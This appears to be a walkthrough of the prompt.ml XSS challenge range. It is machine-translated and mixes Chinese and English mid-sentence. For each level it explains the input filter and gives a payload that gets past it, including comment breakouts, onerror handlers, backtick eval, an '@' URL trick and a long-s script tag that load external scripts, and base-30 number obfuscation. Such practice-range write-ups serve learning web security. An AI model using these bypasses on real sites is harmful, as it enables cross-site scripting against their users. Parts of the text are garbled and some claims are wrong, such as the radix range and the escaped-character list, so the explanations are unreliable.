Online target drone prompt.ml

Range URL to use：http://prompt.ml/0

0x0

There is no filtering whatsoever,Just close the output directly,However, the extra quotes and angle brackets that follow need to be commented out.

a"><!–

0x1

This level filters out all characters enclosed in angle brackets,所以scriptThis label doesn't work anymore.所以可以尝试使用img标签.

<img type=“image” src=1 οnerrοr=prompt(1)//

0x2

This level will be this**“[”“(”**Two symbols are filtered,So there is no way to use it,You can use backticks in place of parentheses.

<script>eval.call`${‘prompt\u00281)’}`</script>

0x3

This level is to filter the comment symbols into underscores,Also a little trick,也可以使用“–!>”来进行注释.

–!><script>prompt(1)</script><!–

0x4

这一关必须以**http://prompt.ml/**You can enter only at the beginning,可以使用@symbol to link external documents to bypass.注意的是,可能在写的过程中,/可能不会被识别,It can be changed to the encoded form.

http://prompt.ml%[email protected]/test.js

test.jsWrite one in the fileprompt(1)就可以了.

0x5

This level is also going to be>和以on开头,=The characters at the end are replaced by =号,So just use a newline.

1"type="image"src=1 onerror
=“prompt(1)”

0x6

This example said,To enter a shape to** http://httpbin.org/post#{“name”:“Matt”}的语句,并且这个#The number divides the string into an array.然后这个fromURLTake the first of this array0位,然后formdataTake the first bit of the array;也就是说,如果输入的是 http://httpbin.org/post#{“name”:“Matt”}那么数组0就是： http://httpbin.org/post**,数组1就是：{“name”:“Matt”}.然后创建了from元素,并且将URL给了fronaction,mode is written aspost;然后对fromData做了循环,然后创建了一个i,并且让input.name=i,这个i就是fromdata对象里的key值,也就是name,然后给value赋值为fromData的值,也就是Matt.The above steps are equivalent to creating onefrom表单.Then just look at your form,并且使用action,That is, if you do not include this formscript或者data的话,就输出,如果有的话,Just go back to the sentence below.
But use it when it is in productionjavascript:prompt(1)的时候,He can export,但是在这里,There was no way he could circumvent that judgment;可以使用actionto cover the one just nowaction,也就是如果action的值相同的时候,The latter will overwrite the former.So this pass is to use the latter oneaction将前一个actionfeatures are overwritten.

javascript:prompt(1)#{“action”:“aaaaa”}

0x7

This one also gives you an example of an output format like thisdog#cat#bird#mouse…,And this one for eachpLabels are subject to a character limit,不可以超过12个字符,This way you can use annotations,Comment out the redundant content,The rest can be pieced together as desired.

"><\script>/#/prompt(/#/1)/#/</script>

This is equivalent to the first comment comment
<p class=“comment” title=“”><script>/*“></p>
<p class=“comment” title=”*/prompt(/*“></p>
<p class=“comment” title=”*/1)/*“></p>
<p class=“comment” title=”*/</script>“></p>
The content of the second note is：
<p class=“comment” title=”“><script>/*”></p>
<p class=“comment” title=“*/prompt(/*“></p>
<p class=“comment” title=”*/1)/*”></p>
<p class=“comment” title=“*/</script>”></p>
The content of the third note is：
<p class=“comment” title=“”><script>/*“></p>
<p class=“comment” title=”*/prompt(/*“></p>
<p class=“comment” title=”*/1)/*“></p>
<p class=“comment” title=”*/</script>"></p>
The final piece is："><script>prompt(1)</script>

0x8

这里的\r\nIt means to start typing from the beginning when changing to the next line.
Then this one,Filter this to empty.并且把
<,/ 和‘"’ 给过滤掉了.这就用到了jsThe one just points：直接输入u2028和u2029

javascript字符串允许直接输入字符,以及字符的转义形式.但是javascript中有5character specifies that it cannot be used directly in a string,Only use their escaped form

1. u005c：反斜杠
2. u000D:回车
3. u0028：行分隔符
4. u0029：段分隔符
5. u000A：换行符

So the input is like this：

将下面的复制,Just paste it into the answer.

0x9

This hurdle will be followed<Beginning and followed by letters have become<followed by an underscore,And the letters are all uppercase.那就不让<后面接字母,可以使用ſ转换为s.如果出不来,换个浏览器试试.

<ſcript src=“http://127.0.0.1/test.js”></ſcript>

0xA

这一关将prompt过滤成了alert,And with the single quotes to comment out,This gives us a convenience,That is, we can use single quotesprompt给分开,The single quotes are also omitted anyway.

pro’mpt(1)

0xB

This level uses a little trick,

"(prompt(1))in"Use this to make popups.

0xC

This level also ignores the single quotes,然后将prompt转为了alert,但是不同的是,This is filtered first,在替换;这样就不可以了.
Here is a function that can be used,It is equivalent to converting English to decimal tree numbers

eval(630038579…toString(30))(1)

parselnt：解析一个字符串并返回指定基数的十进制整数,And the range of the base number is2-26.

But we are convertingprompt的时候,在26There were no numbers before,显示的都是NAN,但是在26之后就有值了;This is because his conversion is made0-9+a-z组成的,而pis the first of the letter16位,然后加上前面的10个字符,就等于26,So from the first26位开始,
这里可能不好理解,Like hexadecimal,his largest letterF,fshot in the first6位,Plus the previous one16进制
Why write here30进制,因为prompt最后一个字母是t,number one in the alphabet20位置,加上前面的10个数就是30;If using less than30的数,not includedt,This is not complete.

0xF

This level also gives the output format,并且限制了pThe maximum number of characters in the label can be entered15.And he filters out the last used comment symbol,但是可以使用<!-- -->注释方式,But I use and no7when treated in the same way,他没有成功,After trying each,还是不成功：

"><!–#–><script><!–#–>prompt<!–#–>(1)<!–#–></script>

So tried the template string way,结果成了

"><script>` ${prompt(1)} `</script>